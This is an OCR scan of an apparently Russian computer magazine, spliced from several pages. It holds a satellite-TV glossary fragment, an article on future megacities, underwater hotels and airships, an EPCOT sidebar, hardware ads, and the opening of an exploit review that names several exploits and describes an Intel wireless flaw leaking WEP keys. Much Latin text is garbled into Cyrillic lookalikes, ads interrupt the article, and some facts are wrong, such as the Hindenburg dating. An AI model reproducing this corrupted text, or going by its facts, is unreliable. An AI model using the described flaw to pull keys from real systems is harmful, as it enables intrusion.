Передаются по общему кабелю 
сТВ-сигналом. 

Поляризация — особое 
свойство радиосигнала, поз- 
воляющее различать сигналы 
похожих частот и таким образом 
передавать больше сигналов в 
пределах имеющейся полосы. 
Выделяют линейную (вертикаль- 
ная/горизонтальная) и круговую 
(левая/правая) поляризацию. 
Скорость передачи, 
ЗушЬоІ Ваіе (5В) — скоро- 
стная характеристика транс- 
пондера, измеряется в тысячах 
символов секунду (к5утЬ/з). 
РЕС (РогѵѵагсІ Еггог 
Соггесііоі — параметр 
транспондера, определяющий 
уровень избыточности при 
кодировании для повышения 
помехоустойчивости потока. Он 
обозначается отношением числа 
полезных бит к общему числу 
бит. Например, РЕС 3/4 означает, 
что на 3 полезных бита в потоке 
приходится 1 контрольный. 
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ЮРИЙ СВИДИНЕНКО АКА І_А2АРШЗ 

/ МЕТАМОКРН@ѴАЫОЕХ.Ви / 



Имплант 



Где и как будут жить люди 



в будущем, в условиях жесткого 



демографического кризиса 



...ОБЫКНОВЕННЫЕ ЛЮДИ... В ОБЩЕМ. НАПОМИНАЮТ 
ПРЕЖНИХ... КВАРТИРНЫЙ ВОПРОС ТОЛЬКО ИСПОРТИЛ 
ИХ...» М.А. БУЛГАКОВ. «МАСТЕР И МАРГАРИТА». 



Массовая культура сильно влияет как на 
тебя в частности, так и на человечество 
вообще. Так влияет, что иногда довольно 
простая проблема, если ее вынести на суд 
общественности, вызывает поток неорди- 
нарных и противоречивых решений. И в 
первую очередь это касается обсуждения 
и проектирования городов настоящего и 

ближайшего будущего. 





к примеру, крэйзи-электронщик, и целыми 
днями что-то паяет и дымит на весь флэт, 
на улицу его не выгонишь (считай, интим 
пропал), а выгнать вообще (по крайней 
мере, до обещанного срока) как-то неудоб- 
но. Твоя благоверная помешана на всякой 
мелкой и крупной живности: жучки, кошеч- 
ки, цветочки. Все подоконники в квартире 
заняты под рассаду. Но ей этого мало, и 
рассадник постепенно переползает в ком- 
нату. Ты же любишь посидеть за компом, 
иногда посмотреть ящик и т.д. и т.п. Но 
через недельку замечаешь, что даже эти 



Вот представь себе: живешь ты спокойно 
со своей девчонкой в однокомнатной квар- 
тире. Тут приезжает твой братепьник-тру- 
догопик и просит пожить у тебя месяц. Он, 









простые удовольствия у тебя отняли: брательник занимает стол 
своим хламом, постоянно стряхивая горячее олово и канифоль на 
подружкину рассаду. Подружка тоже не лыком шита: переходит в 
ванную и там устраивает гидропарк. Ты срочно переоборудуешь 
балкон под конспиративную квартиру, чтобы хоть там спокойно 
посидеть с пивом. Но не тут-то было! Как раз к завершению твоих 
трудов по утеплению, застеклению и проведению на балкон опто- 
волокна приезжает вдруг твоя бабушка, которой надо постоянно 
что-то солить, мариновать и закатывать, и твой стратегический 
балкон ей идеально подходит в роли погреба, а оптоволокно — для 
подвязки помидоров. Подружкина рассада идет на засолку, бра- 
тельник уже пятый раз перепаивает блок питания в твоем компе, 
приговаривая: «Ну, сейчас точно работать будет...». И через ме- 
сяц, давясь бабкиными консервами с оптоволокном, рассадой и 
канифолью, ты понимаешь, как прекрасна жизнь. 

Примерно такая же ситуация развивается вокруг глобального 
квартирного вопроса на нашем глобусе. Возникла довольно ще- 
котливая ситуация: что делать и как жить, когда нас будет гораздо 
больше, чем сегодня. Земля-то не резиновая, следовательно, надо 
либо уходить под воду, либо зарываться в недра и там строить под- 
земные пещеры, либоже вообще жить в воздушных замках. А мож- 
но продолжить благородные начинания небоскребостроителей и 
сделать из всей планеты один большой город. 

То, что места всем не хватит, еще в XVIII веке открыл Томас Маль- 
тус, основатель теории популяции. Он утверждал, что численность 
населения будет расти до тех пор, пока не столкнется с ограничен- 
ным предложением продуктов питания. Он заявил, что население 
растет в геометрической прогрессии, а предложение продуктов 
питания — в арифметической. 

Следовательно, войны и эпидемии не только опасны и вредны, но 
и полезны, так как помогают регулировать количество народа на 
земном шаре. 

Однако те слои прогрессивного человечества, которые в детстве 
читали Льва Толстого и Махатму Ганди, с этим несогласны — все 
жить хотят, поэтому лучше жить плохо и в тесноте, чем вообще 
никак. Опять-таки массовая культура. 

Пришвин научил нас любить природу, поэтому прессоваться в 
каменные цитадели небоскребов нам не хочется. В довершение 
А.П. Чехов научил нас любить все прекрасное. 

Как известно, самые испорченные культурой люди это творческие 
личности, к которым, естественно, относятся архитекторы. Поэ- 
тому результаты их работы по решению глобального квартирного 
вопроса довольно противоречивы, хотя и интересны. 

ІІ НАРАЩИВАНИЕ МУСКУЛОВ 

Самый простой (правда, не технически) представленный способ 
решения демографической проблемы — полное освоение плане- 
ты и превращение всей ее жилой площади в стадо небоскребов. 
Сторонники классического небоскребостроения всеми сила- 
ми стараются обеспечить нам с тобой безоблачное будущее. В 
прямом смысле этого слова. Во всяком случае, рядовой житель 
будущего Пекина практически не будет видеть неба. Это удоволь- 
ствие будет доступно только богатым буратинам, которые будут 
проживать на самом верху километровых небоскребов-труб. Пе- 
рестройка Пекина в Вефпд Воот Тоѵѵег (ВВТ) в 2020-м году сейчас 
обсуждается, разрабатывается проект, и трубный вариант кажет- 
ся самым подходящим для такого плотнонаселенного города. 
Кроме простой перепланировки Пекина, проектирование супер- 
мегаполиса преследует другую цель: правительство Китая хо- 
чет узнать, как запихнуть максимальное количество китайцев на 
квадратный метр площади, и что они при этом будут чувствовать? 
Короче говоря — глобальный эксперимент. И Китай с его населе- 
нием — идеальная для этого платформа. 

Занимается этим группа архитекторов, инженеров и художников 
из нескольких стран, объединившихся в фонд «Динамичный го- 
род» (Эупатіс Сііу Роипбаііоп), со штаб-квартирой в Пекине. 



На площади 0,06 квадратного километра ВВТ умещается 5 тысяч 
квартир, не считая многочисленных офисов, магазинов и иных 
общественных зон. Это возможно благодаря сети 60-этажных 
небоскребов-труб, которые сужаются кверху (для того чтобы к их 
основанию хоть когда-то проникал солнечный свет). ВВТ — это 
попытка переосмыслить город, создать среду, где будут парящие 
площади и небоскребы, сливающиеся у оснований, где транспорт 
обретет настоящую трехмерную свободу. 

Кусочек такого Пекина архитекторы смоделировали на макете. 
А чтобы все могли почувствовать себя муравьями в муравейнике, 
разместили в разных точках макета миниатюрные камеры, транс- 
лирующие на большие экраны вид города глазами его жителей. 
Результаты не воодушевляют. Можешь посмотреть сам. Жители 
нижних ярусов будут видеть синее небо и облака только в снах. Но 
зато этот город чертовски функционален. Транспортные магис- 
трали простираются не только внизу, но и связывают на разных 
уровнях небоскребы-трубы. Буратины могут сразу же въехать к 
себе домой на машине по подземному путепроводу, связанному с 
нужным ярусом трубы-небоскреба. Жителям нижних ярусов будет 
тоже удобно: подземка доставит их непосредственно к основанию 
нужной трубы. Пешеходы и велосипедисты путешествуют внизу, 
среди череды рынков и лотков с едой. На втором уровне — «под- 
земка». 

Т ретий — путепроводы для машин, которые будут пронизывать не- 
боскребы почти на всех уровнях, так что ты сможешь проехать из 
одной трубы в другую напрямую, через связывающие их галереи. 
По совету канадских архитекторов, планируется создание еще 
одной, четвертой, магистрали движения — гигантской сети воз- 
душных труб для велосипедистов — ѴеІо-СИу. 

Это такая связка труб, практически висящих в воздухе, по которым 
ты едешь на велосипеде, невзирая на погодные условия, не видя 
автомобилей, не страдая от загрязнений и прочих вещей. 

Трубы будут сделаны главным образом из стекла, поэтому это 
будет похоже на поездку через длинный атриум. Задуманы три 
полосы движения, точно так же, как на шоссе: для медленной, 
умеренной и быстрой езды. Каждая труба имеет два направления 
движения, отделенных друг от друга. Это разделение снижает 
сопротивление воздуха и создает естественный попутный ветер. 
Таким образом, эффективность езды возрастает примерно до 90% — ве- 
лосипедисты смогут ездить быстрее, развивая скорость до 50 км/час. 
Стеклянные трубы можно установить, где угодно: нет никаких 
выхлопов, никакого шума и никакого вреда центру города они не 
причинят. Выезды из этих труб в самых разных ключевых точках 
много места не займут. 

При таком раскладе богатые обитатели «верха» не будут нуждать- 
ся в визитах в сумеречный «низ». А обитатели «дна» никогда не 
поднимутся к свету. Фантасты нам такое уже рисовали. 

І ГОРОД-САД 

Другой, более дружелюбный, но нестандартный подход заключа- 
ется в объединении небоскребов и природы. Первыми об этом за- 
говорили японцы, которые не мыслят свою жизнь без всякой ике- 
баны. Они предложили строить небоскребы, в которых на каждом 
ярусе находится мини-сад с прудом или другая рекреационная 
зона. Короче говоря, новый проект можно будет смело назвать ви- 
сячими садами Семирамиды XXI века. 

Занимается разработкой «зеленыхпроектов» компанияТакепака. 
Одно из ее предложений — зеленый город-небоскреб Зку Сііу 
1000. Высота Зку Сііу составляет 1 километр при диаметре у ос- 
нования 400 метров. 

Все этажи башни сгруппированы в 14 блоков по 14 этажей. Каж- 
дый блок представляет собой вогнутую чашу, на «дне» которой 
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Представь себя на месте жителя Пекина ;) 



Разные уровни для разных слоев населения 



расположена зеленая зона с живыми деревьями и не менее «жи- 
выми» прудами. 

Между блоками имеются значительные просветы. Они выполняют 
двойную функцию: обеспечивают доступ воздуха к паркам города, 
атакже играют роль противопожарных перегородок. Днище и сте- 
ны каждого блока выполнены из огнеупорных материалов. Естест- 
венное освещение и открытый воздух создают комфортную среду 
обитания для 36-ти тысяч жителей. Многие из них здесь же будут и 
работать. Кроме того, в город каждый день будут и приезжать 1 00 
тысяч рабочих и служащих. И, естественно, туристы. 

Общая обитаемая площадь Зку Сііу составляет 800 гектаров, что 
вполне соответствует небольшому городку. При этом на парки и до- 
роги приходится 240 гектаров — больше четверти общей площади. 
Учитывая то, что небоскребы и тотальная урбанизация — зло не- 
избежное, японский вариант более привлекателен, чем китайские 
трубы. Такихже человеколюбивых взглядов придерживаются и ко- 
рейские урбанисты-архитекторы. 

В 2015 — 2017-х годах завершится строительство самого высо- 
котехнологичного города на Земле — Нью-Сонгдо (ІЧеѵѵ Зопдсіо 
Сііу). Самое интересное состоит в том, что весь город полностью 
спроектировали с нуля и с нуля же начали строить. Займет он пло- 
щадь в 5,57 квадратных километра. Строительство обойдется в 
$25 миллиардов. А жить в нем постоянно будут 500 тысяч человек. 
Расположится Нью-Сонгдо в 64 километрах от Сеула, на берегу 
моря. Он будет частично стоять на воде, как Венеция. Собственно, 
его уже и называют азиатской Венецией XXI века. 
Южнокорейские политики и бизнесмены намерены превратить 
Нью-Сонгдо в один из самых мощных деловых центров Азии, по- 
добно тому, как столетие назад Венеция была одним из торговых 
центров Европы. 

Кроме красоты, зелени, приятной обстановки и отсутствия кило- 
метровых муравейников, в этой бочке меда плавает капелька того, 
о чем ты подумал. 

ІІ БОЛЬШОЙ БРАТ 

Знаешь, зачем составляли проект высокотехнологичного города 
Нью-Сонгдо? Все очень просто: для того, чтобы следить за все- 
ми его жителями. Все строения связаны в локальную сеть, кото- 
рой управляет суперкомпьютер, обрабатывающий все данные о 
состоянии домов и передвижении жителей. Если ты пенсионер, 
и тебе вдруг поплохело, ты вырубился и упал — сверхчувствитель- 
ный пол сразу же даст сигнал медицинскому компьютеру дома, 
тот просканирует микросенсоры, находящиеся в твоей одежде, и, 
если ты действительно так плох, вызывает через суперкомпьютер 
неотложку. Правда, непонятно, что такая система будет делать, 
если ты далеко не старпер, и просто решил развлечься на полу с 
подружкой? 

И это только цветочки. Всем жителям дают карточки-идентифика- 
торы (паспорт, бумажник, права, ключ от квартиры и машины в од- 
ном лице). Естественно, на карточке будет ВРЮ-метка и ряд других 
кодов, что позвол ит следить затобой, хотя проектанты говорят, что 



этого делать никто не собирается (поверили мы им, как же). 
Постройка корейского города Нью-Сонгдо задумывается не толь- 
ко как продажа недвижимости оптом строительными компаниями. 
Это еще и большой эксперимент, который покажет, трудно ли жить 
в обществе, где на тебя стучит даже твой сортир. Чтобы народ все- 
таки захотел жить в этом городе, архитекторы спланировали очень 
удобный и красивый план застройки. В нем будут не только между- 
народные школы, больницы, аптеки и музеи, но и разветвленная 
сеть каналов («Венеция-ХХІ» же). Вдобавок разные вкусности: 
океанариум, поле для гольфа, кафе, магазины, парк, множество 
офисных центров и несколько гостиниц. 

Естественно, первым делом город оккупируют всяческие любите- 
ли взлома ;). Надеюсь, мы еще услышим о сетевых баталиях по 
взлому гостиниц, снятию наличности и т.д. Об этом мы узнаем до- 
вольно скоро: первая фаза строительства (центр города) долж- 
на быть завершена в 2008 году, а полностью Нью-Сонгдо будет 
возведен к 2015 году. Некоторым проектантам мало и тотального 
контроля. Им нужно тотальное подчинение. Например, как часто 
ты бываешь в супермаркете? Удобно затариться по полной про- 
грамме и недельку не отвлекаться от любимых занятий. А слабо 
переехать туда жить? 

Некоторые архитекторы хотят использовать пустующее место 
на крышах этих торговых монстров. Не пропадать же добру! Идея 
проста: на первом этаже делаем супермаркет, а на втором — строим 
дома и, вообще, возводим обычный город. Этот монстр назвали 
ѴѴаІІгороІіз’ом — от названия супермаркета ѴѴаІ-Магі и, вообще, 
название города по-гречески — роііз. 

Только чтобы ты понял, что ничего хорошего из этого не выйдет, я 
представлютебе немного проектной статистики. Г абариты здания: 
1 1 километров на 1 ,6 километра при высоте 90 метров. 1 0 уровней 



Внутри чаши, довольно симпатично 
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...ОРУЖИЕ 

ПОБЕДИТЕЛЯ 



Надежная клавиатура 
и геймерская мышь уже в комплекте! 



Неуязвимость, которая достигается с компьютером Ехсішег™ Сате Мазіег на базе Процессора 
Іпіеі® Репііит® 4 640 с технологией НТ, превращает любое сражение в самопознание, а пределы 



возможного перестают существовать 




ЖИМЕГбаіле Ма$1ег 

Іпіеі® Репііит® 4 640 с технологией НТ 
(2 МБ, 3.2ГГЦ, 800МГц) 

МЬ М5І 915 СотЬо 2-Р 

ОС МісгозоГі® ѴѴіпсІоѵѵ$® ХР МесИа Сепіег ЕсИііоп (Ки$) 
Память ѴѴК2 ОКАМ 1ГБ 533 МГц РС-4200/4300 
Видео ІУІѴЮІА 6800-С5256Е 
СагсІ Кеасіег 6 іп 1 
Жесткий диск 160ГБ, 

5АТА-300, 7200грт, 8МБ Привод 0Ѵ0±КѴѴ 
Порт РігеѴѴіге 
+ 

Антивирус 



ѴѴеЬ: ѵѵѵѵѵѵ.ехсітег.сот/датета5Іег/ СПРАШИВАЙТЕ В МАГАЗИНАХ ЭЛЕКТРОНИКИ 




ехсітеп 



іАііАіілі.ехсітег.сот 



Компания Эксимер рекомендует 
лицензионную ОС Місгозоіі® ѴѴіпсІоѵѵз® ХР 



Обозначения Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, Сепігіпо Іодо, Іпіеі, , Іпіеі Соге, Іпіеі Іодо, ІпіеІ Іпзісіе, Іпіеі Іпзісіе Іодо, Іпіеі ЗреесІЗіер, Іпіеі Ѵііѵ, Іпіеі Хеоп, Ііапіит, Ііапіит Іпзісіе, Соге Іпзісіе, Репііит и Репііит 
Іпзісіе являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениям на территории США и других стран. 






Нью-Сонгдо — почти Венеция 



Супермаркет дома — ѴѴаІІгороІіз 



для всех сторон жизни: от торговли до образования. Постоянное 
население — 1 00 тысяч человек. 1 8 квадратных километров кры- 
ши ѴѴаІІгороІіз должны быть покрыты живописной россыпью отде- 
льных коттеджей, стоящих среди зеленых насаждений и парковых 
дорожек — в точности, как привыкла «одноэтажная» Америка. 
Скрытые внизу автостоянки рассчитаны на 2,5 автомобиля на 
каждую семью горожан. Вдоль фасада мегаздания идет шоссе 
(это, кстати, одна из ключевых магистралей между Штатами. На 
таких трассах и предполагается строить эти города), с которых 
есть въезды на стоянки и, вообще, на разные уровни сооружения. 
Многочисленные грузовики, доставляющие в город все необхо- 
димое для жизни, разгружаются снаружи: по краю здания рас- 
положены специальные площадки (в несколько уровней). С них 
товары поднимаются на нужные этажи по разветвленной системе 
конвейеров, продолжающихся и глубоко внутри здания. Создает- 
ся впечатление, что это, скорее, один огромный комбинат, занятый 
поддержанием своей инфраструктуры, чем жилище для людей. 
Тутнетолько тотальный контроль, тутещепопахиваетограничени- 
ем свободы выбора: попробуй купить что-то, выходящее за номен- 
клатуру ѴѴаІІгороІіз! Неудивительно, что продвижение этого про- 
екта выгодно, в первую очередь, крупным финансовым магнатам, 
которые постоянно ведут войну за рынок сбыта. А тут весь рынок 
сбыта охвачен и подчинен полностью одной торговой структуре. 

ІЙ ВСПОМИНАЯ ЖЮЛЯ ВЕРНА 

Возвращаемся к массовой культуре. Наверное, все, кто читал в де- 
тстве Жюля Верна — в основном про подводные приключения капи- 
тана Немо, — мечтал хотя бы некоторое время пожить именно так. 
Надо сказать, что часть людей, по профессии сталкивающаяся 
с работой на глубине, давно прочувствовала на себе «прелести» 
подводной жизни: кислородное голодание, авитаминоз, кессон- 
ная болезнь. Но вообще проблему жизни под водой всерьез никто 
не ставил, так как на «мелководных» станциях все более-менее в 
порядке, а на глубоководных работают единицы, и дешевле вы- 
платить жителю компенсацию за профзаболевание, чем реструк- 
турировать подводную базу целиком. Для туриста же подводные 
путешествия — золотое дно, поэтому двое ученых-исследовате- 
лей захотели нажиться на благородном стремлении населения к 
дайвингу. Приобщить массы к жизни под водой оказалось проще 
пареной репы: берется старая исследовательская лаборатория и 
переоборудуется под гостиницу. Все довольны: и туристы, и хозя- 
ева гостиницы. 

Поселиться и пожить несколько дней под водой можно уже сегод- 
ня. «Подводный Домик Жюля» фиіез ІІпсІегзеа І_осІде) располо- 
жился на глубине примерно 6,5 метров у берега Флориды, в жи- 
вописном местечке Кеу І_агдо, где подводная обстановка богата 
разнообразнейшей флорой и фауной. 

А сравнительно недалеко от Зиіез находится единственная в мире 
действующая подводная обитаемая лаборатория Ациапиз фиіез 
І_осІде когда-то тоже был научно-исследовательской станцией). 
Пусть в Зиіез — всего две спальни, но это пока единственное место 
на планете, где можно за деньги снять номер под водой и провести 
в нем сколь угодно много времени, совершая вылазки в подводный 
мир. Длина подводного домика равна 15,24 метра, ширина — 6,1 
метра, а высота — 3,35 метра. 

Вход в отель — это открытый кусочек пола (мини-бассейн). Сам 
Домик стоит на ножках, и между дном и его полом есть просвет. 
Давление воздуха в отеле повышенное, точно соответствующее 
глубине, потому вода не поднимается дальше. 

Добираться до отеля нужно в акваланге. Кстати, номер тебе дадут 
только в том случае, если покажешь сертификат дайвера. Выходы 
наружу можно совершать сколько угодно раз (декомпрессии-то 
потом не требуется). И вовсе без акваланга, кстати. Людям, гуляю- 
щим по дну, воздух подаютиз отеля поЗО-метровому шлангу. Кроме 
изумительной природы, гости отеля могут полюбоваться искусно 
воссозданным «испанским галеоном», намеренно затопленным 



тутхозяевами отеля, и попрактиковаться в подводной археологии. 
Но главное — это 1 07-сантиметровый иллюминатор напротив кро- 
вати, мимо которого проплывают рыбки. Однако пожить под водой 
— удовольствие не из дешевых. Ночь в Домике стоит $395 с чело- 
века. Но, несмотря на столь высокие цены, заказывать номер надо 
за несколько месяцев — он никогда не пустует. 

Прогресс не стоит на месте. Неудивительно, что при появлении 
технической возможности построить «небоскреб» под водой за 
это взялись сразу несколько компаний, в разных точках земного 
шара. Например, глава проекта подводной гостиницы на 20 мест 
«Посейдон» (Розеібоп) Брюс Джонс (Впісе Оопез) получил недав- 
но $40 миллионов от инвесторов, чтобы начать строительство рос- 
кошного отеля, комнаты в котором будут погружены более чем на 
1 5 метров под воду. Этот пятизвездочный отель должен покоиться 
на океанском дне, у берега острова Элеутера на Багамах. 

В отличие от «ДомикаЖюля», гости «Посейдона» не должны будут 
надевать подводный костюм и акваланг, чтобы попасть в отель. 
Все будет цивильно — лифт с поверхности доставит под воду всех 
желающих. В роскошные номера ($1 ,5 тысячи за ночь — это даже 
не $395!) постояльцы попадут по внутреннему эскалатору. Естес- 
твенно, давление в отеле будет обычным, атмосферным, что ис- 
ключает возникновение кессонной болезни. Все наружные стены 
отеля планируют сделать прозрачными благодаря современным 
полимерным материалам. Так создастся впечатление, что ты на 
самом деле живешь под водой. 

Мало того, у каждой жилой комнаты площадью 51 м 2 будут огром- 
ные прозрачные акриловые окна, открывающие роскошный вид 
на коралловые сады. Номера будут оснащены джакузи и другими 
вкусностями, без которых не обходится ни один люкс. Пульты уп- 
равления позволят постояльцам включать и выключать освеще- 
ние дна близ своего номера и даже дистанционно кормить рыбок, 
привлекая их к окнам. 

Внутри этот отель совсем не будет походить на внутренние отсеки 
какой-нибудь субмарины. В отделке здесь будут использованы до- 
рогие ткани, кожа и мрамор. А большой ресторан гостиницы будет 
совершать один оборот вокруг своей оси за час, позволяя обеда- 
ющим, не сходя с места увидеть все достопримечательности близ- 
лежащего дна. Не сомневаюсь в том, что в отеле будет шлюзовая 
камера для аквалангистов и прогулочная субмарина. 

Другой проект арабских шейхов — настоящий подводный город. 
Вместо 20-ти мест в «Посейдоне» Гидрополис, строящийся сей- 
час в Дубай на берегу Персидского залива, предложит 220! И по 
демократичным ценам: жить на глубине 20 метров в люксе с высо- 
коклассным обслуживанием будет стоить всего $500 за ночь (это 
не аскетичный «ДомикЖюля»), Назакуску — подводные концерт- 
ный зал , танцзал и ресторан (атакже подводные сады, субмарины, 
прогулки с аквалангом и т.п.). 

Гидрополис станет самым роскошным и впечатляющим подвод- 
ным зданием. Достаточно сказать, что его подводная площадь (не 
считая наземной части, где будет расположена, например, стойка 
администратора) составит 75 тысяч квадратных метров. 
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КЗ Н-ДТВОИ И 75011 



Во Власти Качества 

Джентльмен из бизнес-класса 

1X3 ПАТРОИ и 75011- самый тонкий 17”-й монитор (толщина 35 мм) 

Диагональ - 17” / Время отклика - 8 мс/ Толщина монитора - 35 мм/ Контрастность - 600:1/ Углы обзора - Н: 160°, V: 160°/ 
Поддержка креплений на стол, стену, потолок.- ѴЕ5А/ Соответствие стандартам - ТСО’ОЗ 

ш/ѵѵ.Ід.ги 



Москва(495): Ашан 258-9710, Белый Ветер 730-3075, Бит и Байт 788-004, Дестен Компьютере 970-0007, Дилайн 969-2222, Инкотрейд 673-0275 
ИНЛАЙН 941-6161 Инфорсер 173-9934, Карин 956-1158, Кибертроника 504-2531, НИКС 974-3333, Неоторг 363-3825, НТ компьютере 917-1930 
Регард-Трейд ЛТД 101-4158, Сетевая лаборатория 500-0305, СтартМастер 967-1515, Техносила 777-8-777, Формоза-Альтаир 234-2165 
Ф-Центр 105-6447, Цифровой мир 785-3888, Эльдорадо 500-0000 АѴЭ 158-6362, Рогит Сотриіегз 775-7559, ШТЕК.ВУ 939-2432, ОШІ 232-3009 
Роіагіз 970-1930, Ргопеі 789-3846, Зипгізе 542-8070, ТесЖоте.ш 225-8808, ІАТРА Сотриіегз 775-7566, ІІЗИ Сотриіегз 775-820; Бийск (3854): "Компьютерград” 
333-232; Барнаул (3852): Оргтехсервис 243-296, Благовещенск (4162): Ксерокс Сервис 41-12-16, Джи-Эс-Ти партнер 53-9280; Екатеринбург (343): 
АСМ Электроника 217-9696, Белый Ветер Екатеринбург 377-6518, Трилайн 378-7070, Диджитек 377-7407; Иркутск (3952): 

Альф Компьютере 25-15-45, Комтек 25-83-38; Казань (8432): Логические системы 11-22-33, МЭЛТ 511-12-12, Таііп.сот 264-41-41; Саратов (8452): 
АТТО 444-111, БИТ 268-40-40; Набережные Челны (8552): Элекам 35-8910; Нижневартовск (3466): Ланкорд 61-22-22, Нижний Новгород (8312): 
Домашний компьютер 166-000, Коіа ОізІгіЬиііоп 34-1015, ІІ5Т 30-1674, Ай-Ти-Он 63-01-53; Новосибирск (383): Мега 334-04-40, ТехноСити 332-4163 
Левел 212-0005; Норильск (3919): Солнечный 463756; Омск (3812): “Лаборатория систем 321" 24-54-12, Бизнес Техника 23-33-7 7, Домотехника 58-7777 
Оренбург (3532): КС-Центр 77-47-11; Пермь (342): 21-24646 Инстартехнолоджи; Ростов-на-Дону (8632): Сошриіег-Сііу 290-4590, ТД Иманго 237-0686 
Поиск-компьютер 250-1300; Краснодар (861): Поиск-компьютер 253-3878; Ставрополь (8652): Поиск-Компьютер 77-22-23, Телемир 566-777 
Томск (3822): Стек 554-554; Уфа (3472): Форте ВД 37-9606; Челябинск (3512): Рембыттехника 72-56-01 



Вот он — будущая жемчужина Дубай 



Ночное шоу-пати под водой ■ — что может быть 
лучше? 



Но самым главным и самым притягательным сооружением Г идро- 
полиса будет танцевальный зал, купол которого будет частично 
выходить из-под воды, открывая гостям одновременно вид и на 
подводный мир, и на небо, а на его вершине красивыми ночами 
может открываться окно, дающее возможность звукам и свету 
проникать «надно отеля». Этакрасотаподкрепленасовременным 
оборудованием лазерной подсветки. В общем, постояльцы Г идро- 
полиса скучать не будут. 

ВОЗДУШНЫЕ ЗАМКИ 

Н^бо тоже еще не до конца освоено — так считает большинство фу- 
| ютов. Но осваивать его « по полной » невыгодно — слишком мало 
тогда света будут получать жители и так темных техноскребов. 
Самый лучший вариант, который позволит переселить часть лю- 
дей с земли на небеса — мобильные летающие мини-города. 

Ты, может, знаешь о трагической судьбе мегадирижабля «Гин- 
дербург», который сто лет назад взорвался на финише первого 
воздушного трансатлантического рейса. После этой трагической 
случайности к дирижаблям (хоть они уже и летают на невзрывоо- 
пасном гелии) относятся с опаской. А зря, ведь они — основа «не- 
бесного царства». 

Только представь себе: летающая гостиница для 250-ти богатых 
пассажиров. На борту корабля-отеля длиной в два футбольных 
поля есть все, включая рестораны и казино. Это уже не назовешь 
дирижаблем, скорее это — летающий отель АегозсгаІІ. 

Несмотря на то, что этот монстр тяжелее воздуха, его 396 тысяч 
кубометров гелия поднимают две трети веса — взлететь кораблю с 
400-тонным полезным грузом помогаютшесть турбовентиляторных 
реактивных двигателей. Двигаясь со скоростью 280 км/час, судно 
может пересечь континентальные Штаты примерно за 1 8 часов, а 
вообще, диапазон действия Аегозсгай — около 1 0-ти тысяч км. 
Размеры корабля впечатляют: высота — 50 метров, ширина — 74 
метра, длина — 197 метров. Но притом, что это воздушное суд- 
но крупнее любого авиалайнера, ему на земле требуется меньше 
места, чем любому другому самолету, потому что АегозсгаЙ не нуж- 
дается во взлетно-посадочной полосе: он взлетает и приземляет- 
ся, как вертолет, в том числе на снег или воду. Самое интересное, 
что придумал такое чудо наш соотечественник Игорь Пастернак, 
который после развала совка уехал в США и там организовал 
свою фирму — Аегоз. По оценкам Пастернака, строительство оте- 
ля АегозсгаЙ обойдется примерно в $46 миллионов. 150-местный 
Воеіпд 737 стоит столько же, а его эксплуатация — вдвое дороже. 
АегозсгаЙ сейчас находится на ранних стадиях развития опытного 
образца, но, как ожидается, полностью проект будет закончен к 
201 0-му году — несколько компаний уже выразили свой интерес, и 
в первую очередь военные — для транспорта техники и пехоты. 

Об орбитальных гостиницах мы вскользь упоминали в мартовском 
выпуске Импланта. Эта тема еще не проработана как следует, и, 
возможно, переселение на орбиту реально начнется при будущей 
экспансии человечества в космос. 

Как видишь, при грамотном использовании места можно еще жить 




и жить. Только одно дело — жить в тесном муравейнике без света, 
а другое — в зеленой башне или в красивом городе под водой. 
При грамотном подходе место найдется и для брательника, и для 
подруги, и для бабки, вот только не все у нас в мире делают по-гра- 
мотному, так что смотри в оба! пс 





ПЕРВЫЙ ГОРОД БУДУЩЕГО ХОТЕЛ ПОСТРОИТЬ ЕЩЕ 
УОЛТ ДИСНЕЙ... 




Стадион и общий вид на город 



В ноябре 1965-го года Уолт Дисней объявил, что купил-таки 
землю своей мечты — болото неподалеку от Орландо, во 
Флориде. Выступая на пресс-конференции по поводу этого 
радостного для себя события, Дисней намекнул, что хочет 
на новоприобретенном участке построить нечто большее, 
чем очередной Диснейленд. И действительно, впоследс- 
твии выяснилось, что Дисней в строжайшей тайне зани- 
мался любимым проектом, который в приватных беседах 
называл Ргоіесі X. 

Г ород будущего ЕРСОТ планировался как сердце Мира Дис- 
нея — гигантского Оі$пеу ѴѴогІсІ, общая площадь которого 43 




Это концепты ЕРСОТ'а, сделанні 
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квадратные мили (около 70 квадратных км), что вдвое боль- 
ше Манхеттена. Он должен был быть абсолютно круглым, 
как колесо. Да, Дисней с колесом радиальный план и срав- 
нивает. По замыслу Диснея, в городе должны были быть 
30-этажная гостиница и деловой центр, магазины, театры, 
рестораны, ночные клубы, жилые и офисные здания — пол- 
ностью закрытая окружающая среда с минимумом движе- 
ния внутри. Точнее, так: в центре колеса — главный небос- 
креб. Потом зеленое кольцо, а затем — жилая пригородная 
зона. Сообщение между центром и периферией осуществля- 
ется как по "спицам колеса", так и по "кольцевой". Через 
весь город поперек проходит слева направо центральная 
магистраль. 

Но притом, что королем дорог был объявлен пешеход, жи- 
телей совершенного города предполагалось обеспечить 
самыми современными и экологически чистыми видами 
транспорта: высокоскоростными монорельсовыми дорога- 
ми, человековозами ( "Реоріе Моѵегз"), электрическими так- 
си типа конвейера и тому подобным. Г де-то должен был быть 
и аэропорт будущего. 

Так или иначе, но экспериментальное сообщество завтраш- 
него дня не появилось. Уолт Дисней скончался от рака лег- 
ких 1 5 декабря 1 966-го года. 

Гоі <эят, что реальный ЕРСОТ, построенный после смерти 
:нея, но не соответствующий грандиозности его замыс- 
лов, остается замороженным. 
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Обзор 

ЭКСПЛОЙТОВ 
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ІпіеІ \ѴігеІе$$ Зегѵісе ($24еѵтоп.ехе) 


МогіІІа Гігеіох <= 1.5.0.3 (І.оор) & 


ГгееББМ <= 1.0.9 Кеу ЕхсІшде 


БПагей Метогу Ехріоіі 


1.5.0.4 (Магдиее) ОоБ ехріоіі 


АІдогіІНт Виііег ОѵегТІош Ехріоіі 



Описание: 

Вот взломщики добрались и до ІпіеІ. На 
этот раз представляю тебе эксплойт, кото- 
рый позволяет локальному пользователю 
получить конфигурационные данные бес- 
проводного іпіеі-оборудования. Например, 
ѴѴЕР-ключи. 

Уязвимость существует из-за того, что по 
умолчанию устанавливаются небезопас- 
ные привилегии на доступ к общей секции «\ 
ВазеМатесЮЬіес1з\524ЕѵепіМападегЗІ"іаге 
бМетогу», используемой службой ѴѴігеІезз 
Мападетепі Зегѵісе (324ЕѵМоп.ехе). Ло- 
кальный пользователь может получить важ- 
ные конфигурационные данные, например 
ѴѴЕР-ключи беспроводного адаптера. 



Защита: 

